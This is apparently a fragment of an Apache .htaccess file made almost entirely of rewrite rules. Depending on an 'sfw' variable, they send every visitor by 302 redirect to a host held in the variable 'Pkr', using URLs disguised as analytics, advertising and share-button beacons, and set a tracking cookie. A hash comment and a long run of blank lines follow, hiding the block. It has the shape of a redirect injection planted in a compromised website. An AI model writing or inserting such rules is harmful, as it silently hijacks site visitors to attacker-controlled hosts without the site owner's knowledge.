RewriteRule ^.* http://%{ENV:Pkr}/p?pub=s438b7lqmkmdk5pkfek4&random=1342426821337&pu=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pq=k\%3DfaSMTM0MjQyNjc2NjE2NjM2OTk5ODY\%253DfbSMjJkfcSMWMyfdSZg\%253D\%253DfeSfgSNzA\%253DfhSfiSMjYyfjSfkSMTM4OGVkZWRiNTY\%253DflSMWM\%253DfmSfnSMWIxfoSKDEsMik7KDM2OTksdW5kZWZpbmVkKTsoNDMyLjkzMzM0OTYwOTM3N\%2524x1bmRlZmluZWQpOw\%253D\%253DfpSMjI0fqSNTQ\%253DfrSMTlk&t=view&pt=Bet\%20You\%20Didn\%27t\%20See\%20THESE\%20Pics!\%20-\%20MGID&vGUID=bbe1ae61-d107-1509-bcbd-5c34eaa1dfb8  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9740:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 32
RewriteRule ^.* http://%{ENV:Pkr}/b?c1=8&c2=6864323&rn=0.8143158737461561&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=991&c4=&c5=&c6=&c10=&c15=&c16=&c8=Okezone\%20Bola\%20-\%20\%22Gabung\%20United\%2C\%20Serasa\%20Masuk\%20Sekolah\%20Baru\%22&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=1.8  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11600:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 33
RewriteRule ^.* http://%{ENV:Pkr}/js.php?file=rai&_p\%5BUAg-272\%5D\%5Bdesc\%5D=Uploaded\%20by\%20Sharebee.com\%20::\%20www.androideveryware.com&_p\%5BUAg-272\%5D\%5Breferer\%5D=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&_p\%5BUAg-272\%5D\%5Bzone\%5D=yellow&_p\%5BUAg-272\%5D\%5Bposition\%5D=FileTemplate-Extra1  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11794:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 34
RewriteRule ^.* http://%{ENV:Pkr}/st?_PVID=EGt_42KL1a7hHh6RTrnX9QOOyokXaFAE1XYACkSC&cnt=yan&ad_type=iframe&ad_size=120x600&entity=24276&site_code=mail&section_code=15167778&cb=1342494070744193&yud=zip\%3D\%26ycg\%3Df\%26yyob\%3D1980&pub_redirect_unencoded=1&pub_redirect=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10025:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 35
RewriteRule ^.* http://%{ENV:Pkr}/s?decoding=accelerated&sdetail=f:g-logo-xit\%2Cp:/&bc=474423&hbd=4296654&el=detailpage&tsphab=1&vid=CXh9sV91jWqW0TfFIlh1ah3d8S_J0q27C&tspne=0&plid=AATEJttrz7OyyT88&hbt=72.374&playback=1&feature=g-logo-xit&nsiabblc=7&fv=WIN\%2010\%2C2\%2C159\%2C1&hl=en_US&sd=B6F5EF809HH1341571078329931&nsivbblmax=77264.000&h=360&tspfdt=426&docid=vunosSjGKbM&nsivbblc=7&rt=2.465&nsivbblmin=37734.000&w=480&bd=455062&bt=1.217&cr=ID&tpmt=0&volume=100&nsivbblmean=70300.143&vq=auto&cfps=0&nsiabblmax=1793.000&screenw=1280&len=132.3&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&screenh=800&md=1&playerh=390&sendtmp=1&scoville=1&playerw=640&csipt=watch5&mos=0&hasstoryboard=1&nsiabblmin=70.000&ptk=youtube_none&fexp=920704,921602,914083,924700,913542,907335,922600,919306,919324,907344,907217,920706,919316,902518,924500,912706&fs=0&lact=2972&et=0.163&vw=480&rendering=software&vh=360&sourceid=y&nsidf=1&fmt=34&nsiabblmean=936.857&st=0.163&ns=yt  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11579:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 36
RewriteRule ^.* http://%{ENV:Pkr}/new/www/delivery/ajs.php?zoneid=112&cb=25345434722&charset=UTF-8&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10867:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 37
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=2&utmn=1008801715&utmhn=www.wego.co.id&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x610&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=8.0\%20\%20r22&utmdt=Hotel\%20Murah\%20\%26\%20Penawaran\%20Hotel\%2C\%20Cari\%20Hotel\%2C\%20Bandingkan\%20Harga\%20-\%20Wego\%20Indonesia&utmhid=393732500&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/Corporate/Landing\%2520Page&utmac=UA-22675358-1&utmcc=__utma\%3D1.365278962.1342427388.1342427388.1342427388.1\%3B\%2B__utmz\%3D1.1342427388.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dwego\%3B&utmu=qzGggCAAAAAAAAAAAAAAAAB~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9573:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 38
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=3&utmn=1819829790&utmhn=pilkada.kompas.com&utmcs=UTF-8&utmsr=768x1024&utmvp=980x1185&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Jokowi:\%20Jangan\%20Mainkan\%20Sentimen\%20SARA\%2C\%20Warga\%20Jakarta\%20Sangat\%20Rasional\%20-\%20LIPSUS\%20Jakarta1&utmhid=2015696565&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/berita/read/2012/07/16/16161860/Jokowi.Jangan.Mainkan.Sentimen.SARA.Warga.Jakarta.Sangat.Rasional&utmac=UA-9470746-37&utmcc=__utma\%3D83180439.1613024491.1342430881.1342430881.1342430881.1\%3B\%2B__utmz\%3D83180439.1342430881.1.1.utmcsr\%3Dkompas.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=qAAg~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11384:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 39
RewriteRule ^.* http://%{ENV:Pkr}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/towa_kamoshirenai/v08/c004/47.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11255:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 40
RewriteRule ^.* http://%{ENV:Pkr}/b?c1=2&c2=6034961&rn=0.25830103921343994&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=&c4=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c5=&c6=&c10=&c15=&c16=&c8=Maggie\%20Grace\%20-\%20IMDb&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=1.7  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11343:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 41
RewriteRule ^.* http://%{ENV:Pkr}/t.gif?_=1340243051387&count=vertical&id=twitter-widget-2&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=Sensus\%20Penduduk\%202010\%20-\%20Penduduk\%20Berumur\%205\%20Tahun\%20Keatas\%20Menurut\%20Kelompok\%20Umur\%20dan\%20Pendidikan\%20Tertinggi\%20yang\%20Ditamatkan\%20\%7C\%20Provinsi\%20Sulawesi\%20Tenggara&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1334627957284262969318907  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11832:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 42
RewriteRule ^.* http://%{ENV:Pkr}/_xhr/ugccomments/?method=get_list&context_id=76efd761-83b1-32ff-a21d-2589f3232d84&0.8710602912999952&mode=list&show_form=yes&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&&asset_title=\%5BPhoto\%5D\%20Kim\%20Soo\%20Hyun\%20at\%20an\%20autographing\%20event&ugccmt_vita_type=photo&ugccmt_vita_img_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ugccmt_vita_img_width=110&ugccmt_vita_img_height=88&ugccmt_vita_img_rights=anywhere&ugccmt_vita_photo_album=Kim\%20Soo\%20Hyun\%20at\%20an\%20autographing\%20event&ugccmt_vita_photo_album_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9743:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 43
RewriteRule ^.* http://%{ENV:Pkr}/pview?event=pview&fpc=d96b1f4-1365e51536c-1ac81a4f-1010&sessionID=1340369249816.51802&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/high_school_dxd/c001/&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.VQV0OJpO&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/high_school_dxd/&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=High-School\%20DxD\%201\%20-\%20Read\%20High-School\%20DxD\%20Chapter\%201\%20Online\%20-\%20Page\%201&ts1340369249825.0=  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10537:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 44
RewriteRule ^.* http://%{ENV:Pkr}/getSegment.php?purl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&jsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&rnd=1342178951272  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10534:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 45
RewriteRule ^.* http://%{ENV:Pkr}/dcs84j0o400000gs4jddirf7y_3j9x/dcs.gif?&dcsdat=1342504625508&dcssip=www.ferragamo.com&dcsuri=/webapp/wcs/stores/servlet/TopCategories_31150_35551\%23/product/27661/31960/391307&dcsqry=\%3FrememberStore=Y&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&WT.co_f=26ed0f1371666ad38681342482674583&WT.vtid=26ed0f1371666ad38681342482674583&WT.vtvs=1342504274583&WT.tz=7&WT.bh=12&WT.ul=en-US&WT.cd=24&WT.sr=1024x768&WT.jo=No&WT.ti=Anchor:product/27661/31960/391307&WT.js=Yes&WT.jv=1.8&WT.ct=unknown&WT.bs=1024x638&WT.fv=10.3&WT.slv=Not\%20enabled&WT.tv=8.6.0&WT.dl=21&WT.ssl=0&WT.es=www.ferragamo.com/webapp/wcs/stores/servlet/TopCategories_31150_35551&WT.vt_f_tlh=1342504620  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10007:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 46
RewriteRule ^.* http://%{ENV:Pkr}/s?mos=0&fs=0&sidx=0&hl=en_US&nsivbblmean=336103.672&q=remi\%20gaillard&allowed=1_3,2_1,2_3&rt=73.712&lact=29485&vid=CXh9sV91jWqW0TfFIlh1ah3d8S_J0q27R&ad_event=3&vw=480&rendering=software&vh=360&decoding=accelerated&w=480&ns=yt&cr=ID&at=2_3&nsidf=1&sendtmp=1&nsiabblc=296&hbt=40.012&tspfdt=155&uga=m37&bc=5102604&el=detailpage&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&fexp=920704,921602,914083,919804,913542,907335,922600,919306,924700,906831,907344,907217,924402,920706,919316,902518,919324,924500,912706&fmt=34&tsphab=1&et=22.8,39.912&hbd=4329698&tspne=0&art=2.043&docid=hqOBR_Xbw2I&ad_flags=1&cid=2&len=191&sd=B6F5EF809HH1342353066261223&st=19.52,10.464565916398714&nsivbblmin=8.000&nsivbblmax=578410.000&md=1&csipt=watch5ad&vq=auto&bd=2052113&bt=29.124&sourceid=ys&volume=100&nsivbblc=290&hasstoryboard=1&nsiabblmin=738.000&sst=0&nsiabblmax=153145.000&nsiabblmean=98106.696&vtmp=1&h=360&tpmt=55&cfps=12.510425354462052&nbe=1&screenw=1280&mt=0&slots=sst~0;sidx~0;at~2_3&playerw=640&plid=AATE3O2O0cyD1NLB&screenh=800&scoville=1&ptk=youtube_multi&playerh=390  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10960:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 47
RewriteRule ^.* http://%{ENV:Pkr}/b/ss/arcadiadp/1/H.24.2/s53156970707037?AQB=1&ndh=1&t=12/6/2012\%2010:18:9\%204\%20-420&vmt=46ED4534&vmt=50180B74&ce=UTF-8&ns=arcadia&pageName=DP:Category\%20Display&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cc=GBP&ch=DP:\%20Clothing&c2=683&v2=non-internal\%20campaign&c3=DP:Category:Clothing\%20\%3E\%20Dresses&v3=browse&c4=not\%20logged-in&v4=DP:Category:Clothing\%20\%3E\%20Dresses&c5=not\%20logged-in:DP:Category\%20Display&c6=not\%20logged-in:DP:Category:Clothing\%20\%3E\%20Dresses&c7=DP:Search:\%20All\%20&c8=Data\%20Not\%20Available&v13=DP:Category:Clothing\%20\%3E\%20Dresses&v19=Data\%20Not\%20Available&v27=A-images&s=1024x768&c=24&j=1.7&v=N&k=Y&bw=1024&bh=638&p=Shockwave\%20Flash\%3B2007\%20Microsoft\%20Office\%20system\%3BAdobe\%20Acrobat\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&pid=DP:Category\%20Display&pidt=1&oid=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ot=A&AQE=1  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10203:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 48
RewriteRule ^.* http://%{ENV:Pkr}/delivery/lg.php?bannerid=4271&campaignid=2451&zoneid=766&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=bf937b2c43  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10884:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 49
RewriteRule ^.* http://%{ENV:Pkr}/b?c1=2&c2=8077308&ns__t=1340094059040&ns_c=UTF-8&c8=Mayweather\%20dan\%20Pacquiao\%2C\%20Atlet\%20Berpenghasilan\%20Terbesar\%20-\%20KOMPAS.com&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10361:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 50
RewriteRule ^.* http://%{ENV:Pkr}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/fly_high/v02/c008/7.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10451:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 51
RewriteRule ^.* http://%{ENV:Pkr}/t.gif?_=1341649709667&count=none&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter_tweet_button_0&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=Foto\%20Andrew\%20Garfield\%2C\%20Si\%20Spider-Man\%20Baru\%20\%7C\%20Gambar\%20Andrew\%20Garfield\%2C\%20Si\%20Spider-Man\%20Baru\%20-\%20Yahoo!\%20OMG!\%20Indonesia&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1341629560971737770197830  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9671:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 52
RewriteRule ^.* http://%{ENV:Pkr}/s?vtmp=1&sdetail=n:1\%2Cf:endscreen\%2Crv:jvmIUBD7w50&hasstoryboard=1&plid=AATC-UfjAX-YWWyR&nsivbblc=76&hcbd=1064661&hcbt=9.847000000000001&bd=1128092&tpmt=6&hl=en_US&feature=endscreen&bt=9.675&cfps=3.079291762894534&vq=auto&screenw=1280&h=360&screenh=800&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&playerw=640&playerh=390&w=554&scoville=1&sendtmp=1&pd=2.140&mos=0&fs=0&nbe=1&cr=ID&md=1&csipt=watch5&len=267.542&rt=12.737&nsiabblmin=242.000&volume=100&et=7.732&st=0&lact=13152&fbe=1&nsiabblmax=56583.000&vw=320&rendering=software&vh=208&decoding=accelerated&bc=1373618&ns=yt&fmt=34&fexp=920704,906433,921602,914083,912804,913542,907335,922600,919306,907048,907217,912706,919316,907344,919324&el=detailpage&nsiabblmean=7445.027&tspne=0&nsiabblc=75&nsivbblmin=28700.000&vid=CXh9sV91jWqW0TfFIlh1ah3d8S_J0q27R&tsphab=1&nsivbblmax=146543.000&hbd=4521989&sourceid=yw&uga=m23&tspfdt=469&sd=B6F5EF807HH1340275817893094&nsivbblmean=90836.447&docid=DKTes1g21eE&hbt=42.167  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9519:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 53
RewriteRule ^.* http://%{ENV:Pkr}/delivery/lg.php?bannerid=2184&campaignid=1098&zoneid=507&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=1200489c21  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9703:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 54
RewriteRule ^.* http://%{ENV:Pkr}/pixel;r=1838595658;a=p-b8x17GqsQ_656;fpan=1;fpa=P0-351982835-1341634553321;ns=0;ce=1;je=0;sr=1024x768x24;enc=n;dst=0;et=1341634553320;tzo=-420;ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11084:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 55
RewriteRule ^.* http://%{ENV:Pkr}/delivery/lg.php?bannerid=37017&campaignid=7521&zoneid=1973&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=0b2f408f1f  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9917:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 56
RewriteRule ^.* http://%{ENV:Pkr}/safe_image.php?d=AQDrgu3tk7UXxceF&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11265:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 57
RewriteRule ^.* http://%{ENV:Pkr}/b?c1=7&c2=8097938&rn=212083413&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=8097938&c8=ShareThis\%20Segmenter&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=2.2&cs=js  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9231:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 58
RewriteRule ^.* http://%{ENV:Pkr}/b/ss/hphqglobal,hphqna,hphqnacomprod,hphqprodcat/1/H.24.3/s22313919998320?AQB=1&ndh=1&t=19/5/2012\%2014:30:4\%202\%20-420&vmt=4A466CB3&ce=UTF-8&pageName=HP\%20LaserJet\%201020\%20Printer\%20specifications\%20-\%20HP\%20Small\%20\%26\%20Medium\%20Business\%20products&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=Business&c4=\%7Chttp\%253A//h10010.www1.hp.com/wwpc/us/en/sm/wf06b/18972-236251-236263-14638-f51-439423-439428-439435.html\%253Fdnr\%253D1&c5=r2515\%7C/us/en/smb/pre_sales/products/printing_and_multifunction/printers/black_and_white_hp_laserjet_printers\%7C/wwpc/us/en/sm/WF06b/18972-236251-236263-14638-f51-439423-439428-439435.html&c7=us&c8=en&c9=Smb&c10=us\%7Ceng\%7CSmb&c12=r2515&c13=hphqglobal\%2Chphqna\%2Chphqnacomprod\%2Chphqprodcat&c21=noseg\%7CHP\%20LaserJet\%201020\%20Printer\%20specifications\%20-\%20HP\%20Small\%20\%26\%20Medium\%20Business\%20products&c22=legacy-201108A:js-20120529C&s=1680x1050&c=24&j=1.7&v=N&k=Y&bw=1680&bh=883&p=Shockwave\%20Flash\%3B2007\%20Microsoft\%20Office\%20system\%3BAdobe\%20Acrobat\%3BMicrosoft\%C2\%AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&AQE=1  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10904:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 59
RewriteRule ^.* http://%{ENV:Pkr}/imghover?iact=hm&ei=An3qT6GUDsmmrAfLivHFBQ&q=cigarette&tbs=&page=1&tbnh=138&tbnw=227&start=0&ndsp=16&dur=455&tbnid=UZJApNWZTpiLNM:&hovh=175&hovw=288&vpx=382&vpy=170&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:1,s:0,i:72&vetl=ms  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10547:/:0:HttpOnly]

</IfModule>
#d6f54bbc2b88d636e179d06380e2817ce97ceabdc5a96ec32488e6c9


















































































































































































































































































































































































































































































































































































































































































































































































